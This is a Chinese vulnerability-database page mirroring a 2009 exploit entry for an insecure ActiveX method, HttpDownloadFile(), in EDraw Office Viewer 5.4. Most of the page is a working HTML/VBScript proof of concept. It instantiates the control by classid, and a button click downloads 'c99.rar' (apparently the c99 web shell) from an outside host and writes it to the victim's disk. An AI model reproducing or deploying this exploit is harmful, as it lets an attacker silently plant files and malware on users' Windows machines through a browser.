EDraw Office Viewer 5.4 - 'HttpDownloadFile()' Insecure Method

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057310 漏洞类型
发布时间 2009-01-14 更新时间 2009-01-14
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/7762
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Edraw Office Viewer Component v5.4 HttpDownloadFile() Insecure Method



Founded By : Cyber-Zone
E-mail     : Paradis_des_fous@hotmail.fr
Home       : WwW.Exploiter5.CoM
GreetZ     : Houssamix , Hussin X , JiKo , StaCk , str0ke , The_5p3ctrum , BayHay , All Mgharba Wahed wahed Oujda 2009







<object classid='clsid:6BA21C22-53A5-463f-BBE8-5CF7FFA0132B' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
 Sub tryMe
  On Error Resume Next
    test.HttpDownloadFile "http://exploiter5.com/Cyber-Zone/c99.rar", "c:\Cyber-Zone\c99.rar"
    MsgBox("Done!")
 End Sub
</script>
</span>
</code></pre>

# milw0rm.com [2009-01-14]